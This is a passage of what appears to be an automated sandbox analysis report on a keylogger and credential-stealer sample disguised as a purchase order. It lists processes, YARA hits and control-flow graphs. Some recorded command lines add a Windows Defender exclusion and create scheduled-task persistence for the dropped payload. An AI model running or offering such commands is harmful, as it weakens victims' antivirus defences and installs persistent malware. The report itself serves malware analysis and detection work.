                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:03:05:06
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:1'242'624 bytes
                                                                                                                                                                                                                                    MD5 hash:AC7FF2F8D7B75603AD58755D5762D640
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:03:05:08
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:03:05:08
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                    Start time:03:05:08
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                    Start time:03:05:08
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                    Start time:03:05:15
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:2'354'176 bytes
                                                                                                                                                                                                                                    MD5 hash:A24F8FAC0C18922003D041CBD7188CCD
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                    Start time:03:05:15
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:1'356'800 bytes
                                                                                                                                                                                                                                    MD5 hash:AF4EAE172A1ED3A96A4B508B5229B3B2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                    Start time:03:05:22
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                    Start time:03:05:22
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                    Start time:03:05:23
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5 hash:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                    Start time:03:05:23
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                                                                                                                                                                                                                                    Imagebase:0x880000
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5 hash:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                    Start time:03:05:49
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                                                                                                                    Imagebase:0xcf0000
                                                                                                                                                                                                                                    File size:665'670'656 bytes
                                                                                                                                                                                                                                    MD5 hash:B4B82042C00E471AC2399BADB63F1C10
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:7.5%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:12
                                                                                                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                                                                                                      execution_graph 25864 7ac3c68 25865 7ac3df3 25864->25865 25866 7ac3c8e 25864->25866 25866->25865 25869 7ac42e8 25866->25869 25872 7ac42f0 PostMessageW 25866->25872 25870 7ac42f0 PostMessageW 25869->25870 25871 7ac435c 25870->25871 25871->25866 25873 7ac435c 25872->25873 25873->25866 25874 15ce260 25875 15ce2a8 GetModuleHandleW 25874->25875 25876 15ce2a2 25874->25876 25877 15ce2d5 25875->25877 25876->25875

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 515 596bfd0-596bff9 516 596c017-596c035 call 596b6ec 515->516 517 596bffb-596c00c 515->517 521 596c1c4-596c1d1 516->521 522 596c03b-596c041 516->522 517->516 523 596c213-596c219 call 596b6fc 521->523 524 596c1d3-596c1d8 521->524 525 596c047-596c04d 522->525 526 596c8f1-596c8f7 522->526 532 596c21e-596c228 523->532 528 596c1da-596c1e3 524->528 529 596c20b-596c211 524->529 530 596c053-596c057 525->530 531 596c5f9-596c63a 525->531 528->526 534 596c1e9-596c1ed 528->534 529->523 529->524 535 596c641-596c682 530->535 536 596c05d-596c067 530->536 531->535 540 596c246-596c25c 532->540 541 596c22a-596c23b 532->541 542 596c1f0-596c1f6 534->542 596 596c689-596c6ca 535->596 537 596c085-596c09b 536->537 538 596c069-596c07a 536->538 552 596c0c2-596c0d8 537->552 553 596c09d-596c0a1 537->553 538->537 554 596c262-596c26b 540->554 555 596c5f1-596c5f8 540->555 541->540 542->526 544 596c1fc-596c200 542->544 550 596c206-596c209 544->550 551 596c8a9-596c8ea 544->551 550->529 550->542 551->526 557 596c0da-596c0de 552->557 558 596c11b-596c127 552->558 560 596c0a3-596c0ad 553->560 561 596c0af 553->561 562 596c271-596c277 554->562 563 596c2ef-596c2f9 554->563 566 596c0e7-596c0eb 557->566 567 596c0e0-596c0e5 557->567 582 596c199-596c1af 558->582 583 596c129-596c13b 558->583 568 596c0b1-596c0bc 560->568 561->568 562->526 569 596c27d-596c294 562->569 570 596c317-596c33c 563->570 571 596c2fb-596c30c 563->571 574 596c0f4 566->574 575 596c0ed-596c0f2 566->575 573 596c0f6-596c0f9 567->573 568->552 568->596 605 596c2e6-596c2ed 569->605 606 596c296-596c2a0 569->606 570->555 588 596c342-596c34b 570->588 571->570 573->558 581 596c0fb-596c105 573->581 574->573 575->573 589 596c6d1-596c782 581->589 590 596c10b-596c115 581->590 591 596c1b7-596c1be 582->591 592 596c1b1 582->592 594 596c15d-596c169 583->594 595 596c13d-596c141 583->595 600 596c4e7-596c4f1 588->600 601 596c351-596c35d 588->601 603 596c789-596c7ca 589->603 590->558 590->589 591->521 591->522 592->591 598 596c819-596c8a2 592->598 612 596c18b-596c193 594->612 613 596c16b-596c16f 594->613 602 596c147-596c14b 595->602 595->603 596->589 598->551 624 596c5a8-596c5b2 600->624 609 596c48c-596c496 601->609 602->594 611 596c14d-596c157 602->611 621 596c7d1-596c812 603->621 605->562 605->563 606->605 614 596c2a2-596c2ac 606->614 615 596c4b4-596c4ca 609->615 616 596c498-596c4a9 609->616 611->594 611->603 612->582 620 596c175-596c179 613->620 613->621 622 596c2ae-596c2bf 614->622 623 596c2ca-596c2e4 614->623 639 596c362-596c36c 615->639 640 596c4d0-596c4dc 615->640 616->615 620->612 629 596c17b-596c185 620->629 621->598 622->623 623->563 632 596c5b4-596c5c5 624->632 633 596c5d0-596c5e6 624->633 629->612 629->621 632->633 651 596c4f6-596c500 633->651 652 596c5ec 633->652 645 596c36e-596c37f 639->645 646 596c38a-596c3a3 639->646 640->588 643 596c4e2 640->643 643->555 645->646 663 596c3b7-596c3ca 646->663 664 596c3a5-596c3af 646->664 655 596c502-596c513 651->655 656 596c51e-596c533 651->656 652->555 655->656 673 596c57f-596c583 656->673 675 596c3d0-596c3e7 663->675 676 596c48b 663->676 664->663 677 596c597-596c5a5 673->677 678 596c585-596c58f 673->678 694 596c3ff-596c405 675->694 695 596c3e9-596c3ef 675->695 676->609 685 596c5a7 677->685 686 596c535-596c539 677->686 678->677 685->624 690 596c54d-596c554 686->690 691 596c53b-596c545 686->691 692 596c556-596c560 690->692 693 596c568-596c57a call 596b71c 690->693 691->690 692->693 693->673 700 596c407-596c411 694->700 701 596c419-596c42e call 596b70c 694->701 698 596c3f3-596c3f5 695->698 699 596c3f1 695->699 698->694 699->694 700->701 711 596c430-596c43f 701->711 712 596c459-596c461 701->712 721 596c446-596c449 711->721 722 596c441-596c444 711->722 715 596c463-596c472 712->715 716 596c478-596c483 712->716 715->716 716->676 723 596c44c-596c453 721->723 722->723 723->712
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 48546847fc77da85d66c98ff821271b31e4c3e8dc82a19dead2484875abc3ff1
                                                                                                                                                                                                                                      • Instruction ID: 5089c57771c68a080804c81ecb8ae45470b2cd5eacfb232ba9f073d110c48ff1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48546847fc77da85d66c98ff821271b31e4c3e8dc82a19dead2484875abc3ff1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E521734A00605CFCB14DF68C588A6DB7F6FF89315F6585A8E44A9B761DB31EC8ACB40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e9f88a5018619f53c19d2d518f269209e4c393b937545f9cffa66852c7d071b1
                                                                                                                                                                                                                                      • Instruction ID: c76f67721aace7f34c311dfa06b1572ac8529758e7197cd00d3d4d715a26ecba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9f88a5018619f53c19d2d518f269209e4c393b937545f9cffa66852c7d071b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8D06CB891E118EFCBA0DF55D8455B8BBB8BB0B300F05A099D81EA7262D7309881CE06

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 373 15c6ecc-15c8839 CreateActCtxA 376 15c883b-15c8841 373->376 377 15c8842-15c889c 373->377 376->377 384 15c889e-15c88a1 377->384 385 15c88ab-15c88af 377->385 384->385 386 15c88c0 385->386 387 15c88b1-15c88bd 385->387 387->386
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 015C8829
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742668692.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_15c0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      • Opcode ID: 7da9db9c385ae06e44e89d026886286d8a7448cd9696cb5c6ac53c63f048cbd2
                                                                                                                                                                                                                                      • Instruction ID: 4213d9b93b0fde291303ab118ec6d37b39541ab76d246f02e0ac4168d036968f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7da9db9c385ae06e44e89d026886286d8a7448cd9696cb5c6ac53c63f048cbd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD41F0B0C00619CFDB24DFAAC844BDEBBF5BF48704F24846AD408AB255DB756945CF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 389 7ac42e8-7ac435a PostMessageW 391 7ac435c-7ac4362 389->391 392 7ac4363-7ac4377 389->392 391->392
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 07AC434D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: 365c5612623ac48db47930b1ccd2a98a8e4e46d48105d5697a0849d1048c4683
                                                                                                                                                                                                                                      • Instruction ID: fcde7823573260b35ef75a299158936a97461173b2f0ad5f2c6b0468e0174c18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 365c5612623ac48db47930b1ccd2a98a8e4e46d48105d5697a0849d1048c4683
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C11F5B58003499FDB10DF9AD545BDEFFF8EB48320F10841AD568A7600C375A584CFA5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 394 15ce260-15ce2a0 395 15ce2a8-15ce2d3 GetModuleHandleW 394->395 396 15ce2a2-15ce2a5 394->396 397 15ce2dc-15ce2f0 395->397 398 15ce2d5-15ce2db 395->398 396->395 398->397
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 015CE2C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742668692.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_15c0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: 6aedf6f4604f5bcd6b29adc0adb8febffe192c5fbb1acb7c7885938a3bce5711
                                                                                                                                                                                                                                      • Instruction ID: 50b2eba725efa57a8df84c8ef0a0df07bf15cdc4da3be9170be87cbfc0301422
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aedf6f4604f5bcd6b29adc0adb8febffe192c5fbb1acb7c7885938a3bce5711
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF110FB5C002498FDB14DF9AD445BDEFBF5EB88220F10842AD568B7210C379A545CFA1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 400 7ac42f0-7ac435a PostMessageW 401 7ac435c-7ac4362 400->401 402 7ac4363-7ac4377 400->402 401->402
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 07AC434D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: 40a45050936909a41178af8c1ea4c28dc16c50d9864bb9cbb2f5b02dae321c6d
                                                                                                                                                                                                                                      • Instruction ID: 61b218bd98bf3743aba1697a084c74803da7c640605a540be5dd16dd3ff1fa96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40a45050936909a41178af8c1ea4c28dc16c50d9864bb9cbb2f5b02dae321c6d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E11C2B58002499FDB10DF9AD985BDEBFF8EB48320F148419D558A7210C375A544CFA5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 859a52faa6080cbec0cbde9b582c3ae8c28ad88e367ad0f683db9e36e3134cc1
                                                                                                                                                                                                                                      • Instruction ID: 25b978f64b698a74917f3c0f74925d3c825d532007928ea73909ab504b31684f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859a52faa6080cbec0cbde9b582c3ae8c28ad88e367ad0f683db9e36e3134cc1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47212871504204DFDF09DF58E9C0B66BF65FB94314F20C169D9094B656C336E456C7A2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ebf750f82256ff2948cf2cde9393bba0b2cd2c8ba5aa4b9b9b018c3bbb699563
                                                                                                                                                                                                                                      • Instruction ID: 003cecb4969f29889c3b2f6e5c74a2a7aea4113579df4a552a472082ad0c6be6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebf750f82256ff2948cf2cde9393bba0b2cd2c8ba5aa4b9b9b018c3bbb699563
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21F271504240DFEF09DF58EAC4B2ABF75FB88318F24C569E9094B256C336D456CBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dc679d49e5b27e3d3d8e532bb82e3876e5a6e4adb4b751ef0ba07c6cc12d2f51
                                                                                                                                                                                                                                      • Instruction ID: 79f4f3310c218cf2f7159953a14e972ab1b9e2875357a2e40001ff9995943964
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc679d49e5b27e3d3d8e532bb82e3876e5a6e4adb4b751ef0ba07c6cc12d2f51
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73216778184600DFCF19DF58EAC0B26BF61FB84314F60C56DD8094B656C336C407CA62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5be83150f19e832ecaef96136cb22cb64ee60f79123bbf055055cf146bdd9585
                                                                                                                                                                                                                                      • Instruction ID: 818f90fd4b1002407f4c203d60005200914e1db78526ea16654b4a4c11aaef91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be83150f19e832ecaef96136cb22cb64ee60f79123bbf055055cf146bdd9585
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1214979504600DFDF09DF98E5C0B26BFA5FB84324F60C56EE8094B652C336D446CA62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9a23a3cc52baeac2cc78fc212fb339c6aaf4e9a1c402bfe0e31e1adbd43c6d74
                                                                                                                                                                                                                                      • Instruction ID: 3ede24d68286c1751833cbacb1b9313b1db6f5eb89f3d5a4c812a8a658becbf2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a23a3cc52baeac2cc78fc212fb339c6aaf4e9a1c402bfe0e31e1adbd43c6d74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE21C2754487809FCB07CF24D994711BF71EF46214F28C5DAD8498F6A7C33A980ACB62
